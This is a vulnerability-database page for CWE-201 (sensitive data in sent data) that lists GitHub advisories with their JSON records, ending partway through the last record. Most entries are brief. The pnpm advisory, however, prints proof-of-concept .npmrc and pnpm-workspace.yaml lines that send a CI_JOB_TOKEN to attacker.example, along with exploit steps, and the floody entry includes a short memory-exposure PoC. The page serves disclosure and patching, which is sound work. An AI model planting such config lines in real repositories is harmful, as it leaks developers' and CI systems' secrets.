Common Weakness Enumeration

CWE-201

Allowed

Insertion of Sensitive Information Into Sent Data

Abstraction: Base · Status: Draft

The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.

674 vulnerabilities reference this CWE, most recent first.

GHSA-3G92-W8C5-73PQ

Vulnerability from github – Published: 2024-07-09 13:32 – Updated: 2024-07-09 13:32
VLAI
Summary
Undici vulnerable to data leak when using response.arrayBuffer()
Details

Impact

Depending on network and process conditions of a fetch() request, response.arrayBuffer() might include portion of memory from the Node.js process.

Patches

This has been patched in v6.19.2.

Workarounds

There are no known workaround.

References

https://github.com/nodejs/undici/issues/3337 https://github.com/nodejs/undici/issues/3328 https://github.com/nodejs/undici/pull/3338 https://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.14.0"
            },
            {
              "fixed": "6.19.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-38372"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-09T13:32:30Z",
    "nvd_published_at": "2024-07-08T21:15:12Z",
    "severity": "LOW"
  },
  "details": "### Impact\n\nDepending on network and process conditions of a `fetch()` request, `response.arrayBuffer()` might include portion of memory from the Node.js process.\n\n### Patches\n\nThis has been patched in v6.19.2.\n\n### Workarounds\n\nThere are no known workaround.\n\n### References\n\nhttps://github.com/nodejs/undici/issues/3337\nhttps://github.com/nodejs/undici/issues/3328\nhttps://github.com/nodejs/undici/pull/3338\nhttps://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36",
  "id": "GHSA-3g92-w8c5-73pq",
  "modified": "2024-07-09T13:32:30Z",
  "published": "2024-07-09T13:32:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-3g92-w8c5-73pq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38372"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/issues/3328"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/issues/3337"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/pull/3338"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/commit/f979ec3204ca489abf30e7d20e9fee9ea7711d36"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Undici vulnerable to data leak when using response.arrayBuffer()"
}

GHSA-3H82-23P6-HHFF

Vulnerability from github – Published: 2026-03-05 06:30 – Updated: 2026-03-09 21:31
VLAI
Details

Insertion of Sensitive Information Into Sent Data vulnerability in RadiusTheme Classified Listing classified-listing allows Retrieve Embedded Sensitive Data.This issue affects Classified Listing: from n/a through <= 5.3.4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-23546"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-05T06:16:22Z",
    "severity": "MODERATE"
  },
  "details": "Insertion of Sensitive Information Into Sent Data vulnerability in RadiusTheme Classified Listing classified-listing allows Retrieve Embedded Sensitive Data.This issue affects Classified Listing: from n/a through \u003c= 5.3.4.",
  "id": "GHSA-3h82-23p6-hhff",
  "modified": "2026-03-09T21:31:33Z",
  "published": "2026-03-05T06:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23546"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/classified-listing/vulnerability/wordpress-classified-listing-plugin-5-3-4-sensitive-data-exposure-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3MFH-F79J-GPV8

Vulnerability from github – Published: 2026-07-09 12:30 – Updated: 2026-07-09 12:30
VLAI
Details

Insertion of sensitive information into sent data vulnerability in Sayax Energy Technologies Inc. OSOS allows Authentication Bypass.

This issue affects OSOS: through 09072026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1365"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-09T10:16:25Z",
    "severity": "MODERATE"
  },
  "details": "Insertion of sensitive information into sent data vulnerability in Sayax Energy Technologies Inc. OSOS allows Authentication Bypass.\n\nThis issue affects OSOS: through 09072026.\u00a0NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-3mfh-f79j-gpv8",
  "modified": "2026-07-09T12:30:27Z",
  "published": "2026-07-09T12:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1365"
    },
    {
      "type": "WEB",
      "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0520"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3MFM-982M-7GVC

Vulnerability from github – Published: 2025-02-14 15:31 – Updated: 2026-04-01 18:33
VLAI
Details

Insertion of Sensitive Information Into Sent Data vulnerability in brandtoss WP Mailster allows Retrieve Embedded Sensitive Data. This issue affects WP Mailster: from n/a through 1.8.16.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-24567"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-14T13:15:48Z",
    "severity": "MODERATE"
  },
  "details": "Insertion of Sensitive Information Into Sent Data vulnerability in brandtoss WP Mailster allows Retrieve Embedded Sensitive Data. This issue affects WP Mailster: from n/a through 1.8.16.0.",
  "id": "GHSA-3mfm-982m-7gvc",
  "modified": "2026-04-01T18:33:39Z",
  "published": "2025-02-14T15:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24567"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/wp-mailster/vulnerability/wordpress-wp-mailster-plugin-1-8-16-0-sensitive-data-exposure-vulnerability-2?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3P92-886G-QXPQ

Vulnerability from github – Published: 2019-06-04 15:42 – Updated: 2021-08-04 21:27
VLAI
Summary
Remote Memory Exposure in floody
Details

Versions of floody before 0.1.1 are vulnerable to remote memory exposure.

.write(number)in the affectedfloody` versions passes a number to Buffer constructor, appending a chunk of uninitialized memory.

Proof of Concept:

``` var f = require('floody')(process.stdout); f.write(USERSUPPLIEDINPUT); 'f.stop();

Recommendation

Update to version 0.1.1 or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "floody"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2019-06-04T15:40:44Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "Versions of `floody` before 0.1.1 are vulnerable to remote memory exposure.\n\n.write(number)` in the affected `floody` versions passes a number to Buffer constructor, appending a chunk of uninitialized memory.\n\nProof of Concept: \n\n```\nvar f = require(\u0027floody\u0027)(process.stdout); \nf.write(USERSUPPLIEDINPUT); \n\u0027f.stop();\n\n\n## Recommendation\n\nUpdate to version 0.1.1 or later.",
  "id": "GHSA-3p92-886g-qxpq",
  "modified": "2021-08-04T21:27:04Z",
  "published": "2019-06-04T15:42:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/soldair/node-floody/commit/6c44722312131f4ac8a1af40f0f861c85efe01b0"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/npm:floody:20160115"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/601"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Remote Memory Exposure in floody"
}

GHSA-3PF2-CHRH-RQ92

Vulnerability from github – Published: 2026-06-26 15:32 – Updated: 2026-06-26 15:32
VLAI
Details

Unauthenticated Sensitive Data Exposure in Object Cache 4 everyone <= 2.3.2 versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-54834"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-26T15:16:40Z",
    "severity": "HIGH"
  },
  "details": "Unauthenticated Sensitive Data Exposure in Object Cache 4 everyone \u003c= 2.3.2 versions.",
  "id": "GHSA-3pf2-chrh-rq92",
  "modified": "2026-06-26T15:32:15Z",
  "published": "2026-06-26T15:32:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54834"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/object-cache-4-everyone/vulnerability/wordpress-object-cache-4-everyone-plugin-2-3-2-sensitive-data-exposure-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3QHV-2RGH-X77R

Vulnerability from github – Published: 2026-06-26 23:12 – Updated: 2026-06-26 23:12
VLAI
Summary
pnpm: Repository config can expand victim environment secrets into registry requests before scripts run
Details

Maintainer Action Plan

This report is ready to review with the shared patch branch. Start with the PR and the expected fixed behavior, then use the detailed exploit narrative below only if you want to replay the original path.

  • Advisory: CAND-PNPM-122 / GHSA-3qhv-2rgh-x77r
  • Advisory URL: https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r
  • Shared patch PR: https://github.com/pnpm/pnpm-ghsa-j2hc-m6cf-6jm8/pull/1
  • Shared patch branch: security/ghsa-batch-2026-06-09
  • Patch commit: a93449314f398cf4bdf2e28d033c02d37395ad22
  • Base commit: origin/main 55a4035abf1ae3fe7208ba1f5ef43c5eff58ccec
  • Maintainer priority: start-here
  • Component: pnpm config/env replacement and registry auth
  • Patch area: project .npmrc env placeholders are not expanded into registry/auth destinations
  • Affected packages: npm:pnpm, npm:@pnpm/config.reader, rust:pacquet
  • CWE IDs: CWE-201, CWE-200, CWE-522
  • Conservative CVSS: 6.5 / CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
  • Next action: review the shared patch branch for this component, set the final affected version range, merge and release the fix, then publish or close the advisory.

Expected Patched Behavior

Project .npmrc environment placeholders do not expand into registry or auth destinations; the secret is absent from the request URL and auth header.

Files And Tests To Review

  • config/reader/src/loadNpmrcFiles.ts
  • config/reader/src/getOptionsFromRootManifest.ts
  • config/reader/test/index.ts
  • config/reader/test/getOptionsFromRootManifest.test.ts
  • pacquet/crates/config/src/npmrc_auth.rs
  • pacquet/crates/config/src/npmrc_auth/tests.rs
  • pacquet/crates/config/src/workspace_yaml.rs
  • pacquet/crates/config/src/workspace_yaml/tests.rs
  • .changeset/sharp-registry-env-placeholders.md

Focused Validation

Run these from a checkout of the shared patch branch. They are the useful maintainer commands with machine-local artifact paths removed.

./node_modules/.bin/tsgo --build config/reader/tsconfig.json
NODE_OPTIONS="--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169" ../../node_modules/.bin/jest test/getOptionsFromRootManifest.test.ts --runInBand
NODE_OPTIONS="--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169" ../../node_modules/.bin/jest test/index.ts -t "project \.npmrc does not expand env variables in registry URLs|project \.npmrc does not expand env variables in scoped registry URLs or URL-scoped keys|project \.npmrc does not expand env variables in auth values|user \.npmrc may expand env variables in registry URLs|drops the placeholder when the env var is unset|substitutes normally when the env var is set|only drops the unresolved placeholder|explicit .*undefined.* fallbacks|pnpm-workspace\.yaml registries do not expand env variables|return a warning when the \.npmrc has an env variable" --runInBand
./node_modules/.bin/eslint config/reader/src/loadNpmrcFiles.ts config/reader/src/getOptionsFromRootManifest.ts config/reader/test/index.ts config/reader/test/getOptionsFromRootManifest.test.ts
cargo fmt --manifest-path pacquet/crates/config/Cargo.toml --check
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_scoped_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_url_scoped_keys --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_auth_values --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml trusted_ini_expands_env_placeholders_in_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml ignores_env_vars_inside_workspace_registry_values --lib
git diff --check
cargo fmt --check

The full patched replay for the shared branch passed with all 20 candidates marked fixed. This candidate's replay evidence is results/CAND-PNPM-122-patched-result.json.

CAND-PNPM-122: Repository config can expand victim environment secrets into registry requests before scripts run

Advisory Details

Summary

pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run.

Details

The vulnerable TypeScript pnpm path was:

  • config/reader/src/loadNpmrcFiles.ts loaded project .npmrc and substituted environment placeholders in keys and values.
  • config/reader/src/getOptionsFromRootManifest.ts substituted environment placeholders inside workspace registry, registries, and namedRegistries settings.
  • config/reader/src/index.ts merged those expanded registry/auth values into pnpmConfig.registries, pnpmConfig.authConfig, and pnpmConfig.configByUri.
  • resolving/npm-resolver/src/fetch.ts built metadata request URLs from the selected registry.
  • network/fetch/src/fetchFromRegistry.ts dispatched the request and attached matching auth headers before install lifecycle scripts could run.

The pacquet parity path was:

  • pacquet/crates/config/src/npmrc_auth.rs expanded project .npmrc placeholders while parsing registry URLs and auth values.
  • pacquet/crates/config/src/workspace_yaml.rs expanded workspace registry placeholders.
  • pacquet/crates/resolving-npm-resolver/src/fetch_full_metadata.rs used the configured registry URL and AuthHeaders for metadata fetches.

PoC

Repository .npmrc URL-path exfiltration:

registry=https://attacker.example/${CI_JOB_TOKEN}/

Repository .npmrc auth-header exfiltration:

registry=https://attacker.example/
//attacker.example/:_authToken=${CI_JOB_TOKEN}

Repository pnpm-workspace.yaml URL-path exfiltration:

registries:
  default: https://attacker.example/${CI_JOB_TOKEN}/
namedRegistries:
  work: https://attacker.example/${CI_JOB_TOKEN}/npm/

Exploit method:

  1. The victim checks out the repository and runs a pnpm or pacquet dependency-management command with CI_JOB_TOKEN or another sensitive environment variable present.
  2. Before the patch, repository config expanded the placeholder to the victim secret.
  3. The resolver used the expanded registry or matching auth entry to construct a metadata request.
  4. The victim sent a request such as https://attacker.example/<secret>/<package> or Authorization: Bearer <secret> to the attacker-controlled endpoint.

Validation PoC:

The PoC models the pre-patch URL and Authorization-header leaks, then verifies that patched pnpm and pacquet do not keep the secret in repository-controlled registry destinations or credential values.

Impact

A malicious repository can disclose environment secrets present in a developer or CI process to a repository-selected registry before script controls apply. This can expose npm tokens, CI job tokens, OIDC helper inputs, or other conventional environment secrets if the attacker knows or guesses their names.

Affected Products

Ecosystem: npm

Package name: pnpm, @pnpm/config.reader; pacquet Rust port

Affected versions: current main before this patch, when project .npmrc or pnpm-workspace.yaml contains environment placeholders in registry request destinations or project .npmrc contains environment placeholders in registry credential values.

Patched versions: pending release containing this patch.

Severity

Severity before patch: High

Vector string before patch: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Score before patch: 7.4

Severity after patch: None

Vector string after patch: not vulnerable after patch

Score after patch: 0.0

Rationale: exploitation is remote and low complexity once a victim runs pnpm or pacquet in the malicious repository. No attacker privileges are required, but user interaction is required. The demonstrated sink is secret disclosure through outbound registry requests, not arbitrary code execution, so confidentiality is high while integrity and availability are not directly impacted by this finding. After the patch, repository-controlled registry destinations and credential values containing env placeholders are ignored, while trusted user/global/auth.ini/CLI config still expands.

Weaknesses

CWE-201: Insertion of Sensitive Information Into Sent Data

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

CWE-522: Insufficiently Protected Credentials

Patch

The patch makes environment expansion trust-aware for registry requests:

  • Project .npmrc no longer expands ${...} in registry, @scope:registry, proxy URL values, URL-scoped keys such as //host/${SECRET}/:_authToken, or registry credential values such as //host/:_authToken=${SECRET} and _authToken=${SECRET}.
  • User .npmrc, auth.ini, CLI, global, and environment config still support env expansion for trusted registry configuration.
  • pnpm-workspace.yaml no longer expands ${...} in registry, registries, or namedRegistries URL values.
  • Trusted user-level auth values such as //registry.npmjs.org/:_authToken=${NODE_AUTH_TOKEN} still expand or lossy-drop as before, preserving setup-node and OIDC trusted-publishing behavior when the .npmrc is supplied as user config.
  • Pacquet mirrors the same boundary with from_project_ini() for project .npmrc and workspace registry filtering.

Changed files:

  • config/reader/src/loadNpmrcFiles.ts
  • config/reader/src/getOptionsFromRootManifest.ts
  • config/reader/test/index.ts
  • config/reader/test/getOptionsFromRootManifest.test.ts
  • pacquet/crates/config/src/npmrc_auth.rs
  • pacquet/crates/config/src/npmrc_auth/tests.rs
  • pacquet/crates/config/src/workspace_yaml.rs
  • pacquet/crates/config/src/workspace_yaml/tests.rs

Changeset:

  • .changeset/sharp-registry-env-placeholders.md

Pacquet parity:

Ported in the same patch. Pacquet dependency-management commands now parse project .npmrc with request-destination and credential-value env expansion disabled, and drop workspace registry values containing ${...} placeholders.

Verification

Post-patch validation:

The PoC ran:

./node_modules/.bin/tsgo --build config/reader/tsconfig.json
NODE_OPTIONS="--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169" ../../node_modules/.bin/jest test/getOptionsFromRootManifest.test.ts --runInBand
NODE_OPTIONS="--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169" ../../node_modules/.bin/jest test/index.ts -t "project \.npmrc does not expand env variables in registry URLs|project \.npmrc does not expand env variables in scoped registry URLs or URL-scoped keys|project \.npmrc does not expand env variables in auth values|user \.npmrc may expand env variables in registry URLs|drops the placeholder when the env var is unset|substitutes normally when the env var is set|only drops the unresolved placeholder|explicit .*undefined.* fallbacks|pnpm-workspace\.yaml registries do not expand env variables|return a warning when the \.npmrc has an env variable" --runInBand
./node_modules/.bin/eslint config/reader/src/loadNpmrcFiles.ts config/reader/src/getOptionsFromRootManifest.ts config/reader/test/index.ts config/reader/test/getOptionsFromRootManifest.test.ts
cargo fmt --manifest-path pacquet/crates/config/Cargo.toml --check
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_scoped_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_url_scoped_keys --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_auth_values --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml trusted_ini_expands_env_placeholders_in_registry_urls --lib
cargo test --manifest-path pacquet/crates/config/Cargo.toml ignores_env_vars_inside_workspace_registry_values --lib
git diff --check

Results:

  • PoC pre-patch model showed cand122-ci-job-token in both a request URL and a bearer auth header.
  • TypeScript build for config.reader: passed.
  • Focused root-manifest tests: 8 passed, including workspace registry and named-registry placeholder denial.
  • Focused config-reader integration tests: 10 passed, covering project .npmrc default registry denial, scoped registry denial, URL-scoped-key denial, project auth-value denial, trusted user .npmrc registry expansion, trusted user auth-value expansion/lossy fallback, and workspace registry denial.
  • cargo fmt --check: passed.
  • Focused pacquet tests: 6 passed, covering project .npmrc registry denial, scoped registry denial, URL-scoped-key denial, auth-value denial, trusted .npmrc registry expansion, and workspace YAML denial.
  • git diff --check: passed.

CVSS Reassessment

The initial scan score used a repository-code-execution vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (8.8 High)

The PoC and source trace showed this finding is direct secret disclosure through registry request URLs or Authorization headers, not a code execution path. The corrected vulnerable vector is:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Corrected vulnerable score: 7.4 High.

Final score after patch: 0.0.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "pnpm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.34.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "pnpm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0"
            },
            {
              "fixed": "11.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55180"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-201",
      "CWE-522"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-26T23:12:25Z",
    "nvd_published_at": "2026-06-25T18:16:40Z",
    "severity": "MODERATE"
  },
  "details": "\u003c!-- maintainer-action:start --\u003e\n## Maintainer Action Plan\n\nThis report is ready to review with the shared patch branch. Start with the PR and the expected fixed behavior, then use the detailed exploit narrative below only if you want to replay the original path.\n\n- Advisory: `CAND-PNPM-122` / `GHSA-3qhv-2rgh-x77r`\n- Advisory URL: https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r\n- Shared patch PR: https://github.com/pnpm/pnpm-ghsa-j2hc-m6cf-6jm8/pull/1\n- Shared patch branch: `security/ghsa-batch-2026-06-09`\n- Patch commit: `a93449314f398cf4bdf2e28d033c02d37395ad22`\n- Base commit: `origin/main` `55a4035abf1ae3fe7208ba1f5ef43c5eff58ccec`\n- Maintainer priority: `start-here`\n- Component: `pnpm config/env replacement and registry auth`\n- Patch area: project .npmrc env placeholders are not expanded into registry/auth destinations\n- Affected packages: `npm:pnpm`, `npm:@pnpm/config.reader`, `rust:pacquet`\n- CWE IDs: `CWE-201`, `CWE-200`, `CWE-522`\n- Conservative CVSS: `6.5` / `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`\n- Next action: review the shared patch branch for this component, set the final affected version range, merge and release the fix, then publish or close the advisory.\n\n### Expected Patched Behavior\n\nProject `.npmrc` environment placeholders do not expand into registry or auth destinations; the secret is absent from the request URL and auth header.\n\n### Files And Tests To Review\n\n- `config/reader/src/loadNpmrcFiles.ts`\n- `config/reader/src/getOptionsFromRootManifest.ts`\n- `config/reader/test/index.ts`\n- `config/reader/test/getOptionsFromRootManifest.test.ts`\n- `pacquet/crates/config/src/npmrc_auth.rs`\n- `pacquet/crates/config/src/npmrc_auth/tests.rs`\n- `pacquet/crates/config/src/workspace_yaml.rs`\n- `pacquet/crates/config/src/workspace_yaml/tests.rs`\n- `.changeset/sharp-registry-env-placeholders.md`\n\n### Focused Validation\n\nRun these from a checkout of the shared patch branch. They are the useful maintainer commands with machine-local artifact paths removed.\n\n```bash\n./node_modules/.bin/tsgo --build config/reader/tsconfig.json\nNODE_OPTIONS=\"--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169\" ../../node_modules/.bin/jest test/getOptionsFromRootManifest.test.ts --runInBand\nNODE_OPTIONS=\"--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169\" ../../node_modules/.bin/jest test/index.ts -t \"project \\.npmrc does not expand env variables in registry URLs|project \\.npmrc does not expand env variables in scoped registry URLs or URL-scoped keys|project \\.npmrc does not expand env variables in auth values|user \\.npmrc may expand env variables in registry URLs|drops the placeholder when the env var is unset|substitutes normally when the env var is set|only drops the unresolved placeholder|explicit .*undefined.* fallbacks|pnpm-workspace\\.yaml registries do not expand env variables|return a warning when the \\.npmrc has an env variable\" --runInBand\n./node_modules/.bin/eslint config/reader/src/loadNpmrcFiles.ts config/reader/src/getOptionsFromRootManifest.ts config/reader/test/index.ts config/reader/test/getOptionsFromRootManifest.test.ts\ncargo fmt --manifest-path pacquet/crates/config/Cargo.toml --check\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_scoped_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_url_scoped_keys --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_auth_values --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml trusted_ini_expands_env_placeholders_in_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml ignores_env_vars_inside_workspace_registry_values --lib\ngit diff --check\ncargo fmt --check\n```\n\nThe full patched replay for the shared branch passed with all 20 candidates marked fixed. This candidate\u0027s replay evidence is `results/CAND-PNPM-122-patched-result.json`.\n\u003c!-- maintainer-action:end --\u003e\n\n# CAND-PNPM-122: Repository config can expand victim environment secrets into registry requests before scripts run\n\n## Advisory Details\n\n### Summary\n\npnpm and pacquet expanded `${ENV_VAR}` placeholders from repository-controlled `.npmrc` and `pnpm-workspace.yaml` into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run.\n\n### Details\n\nThe vulnerable TypeScript pnpm path was:\n\n- `config/reader/src/loadNpmrcFiles.ts` loaded project `.npmrc` and substituted environment placeholders in keys and values.\n- `config/reader/src/getOptionsFromRootManifest.ts` substituted environment placeholders inside workspace `registry`, `registries`, and `namedRegistries` settings.\n- `config/reader/src/index.ts` merged those expanded registry/auth values into `pnpmConfig.registries`, `pnpmConfig.authConfig`, and `pnpmConfig.configByUri`.\n- `resolving/npm-resolver/src/fetch.ts` built metadata request URLs from the selected registry.\n- `network/fetch/src/fetchFromRegistry.ts` dispatched the request and attached matching auth headers before install lifecycle scripts could run.\n\nThe pacquet parity path was:\n\n- `pacquet/crates/config/src/npmrc_auth.rs` expanded project `.npmrc` placeholders while parsing registry URLs and auth values.\n- `pacquet/crates/config/src/workspace_yaml.rs` expanded workspace registry placeholders.\n- `pacquet/crates/resolving-npm-resolver/src/fetch_full_metadata.rs` used the configured registry URL and `AuthHeaders` for metadata fetches.\n\n### PoC\n\nRepository `.npmrc` URL-path exfiltration:\n\n```ini\nregistry=https://attacker.example/${CI_JOB_TOKEN}/\n```\n\nRepository `.npmrc` auth-header exfiltration:\n\n```ini\nregistry=https://attacker.example/\n//attacker.example/:_authToken=${CI_JOB_TOKEN}\n```\n\nRepository `pnpm-workspace.yaml` URL-path exfiltration:\n\n```yaml\nregistries:\n  default: https://attacker.example/${CI_JOB_TOKEN}/\nnamedRegistries:\n  work: https://attacker.example/${CI_JOB_TOKEN}/npm/\n```\n\nExploit method:\n\n1. The victim checks out the repository and runs a pnpm or pacquet dependency-management command with `CI_JOB_TOKEN` or another sensitive environment variable present.\n2. Before the patch, repository config expanded the placeholder to the victim secret.\n3. The resolver used the expanded registry or matching auth entry to construct a metadata request.\n4. The victim sent a request such as `https://attacker.example/\u003csecret\u003e/\u003cpackage\u003e` or `Authorization: Bearer \u003csecret\u003e` to the attacker-controlled endpoint.\n\nValidation PoC:\n\nThe PoC models the pre-patch URL and Authorization-header leaks, then verifies that patched pnpm and pacquet do not keep the secret in repository-controlled registry destinations or credential values.\n\n### Impact\n\nA malicious repository can disclose environment secrets present in a developer or CI process to a repository-selected registry before script controls apply. This can expose npm tokens, CI job tokens, OIDC helper inputs, or other conventional environment secrets if the attacker knows or guesses their names.\n\n## Affected Products\n\nEcosystem: npm\n\nPackage name: `pnpm`, `@pnpm/config.reader`; pacquet Rust port\n\nAffected versions: current main before this patch, when project `.npmrc` or `pnpm-workspace.yaml` contains environment placeholders in registry request destinations or project `.npmrc` contains environment placeholders in registry credential values.\n\nPatched versions: pending release containing this patch.\n\n## Severity\n\nSeverity before patch: High\n\nVector string before patch: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N`\n\nScore before patch: 7.4\n\nSeverity after patch: None\n\nVector string after patch: not vulnerable after 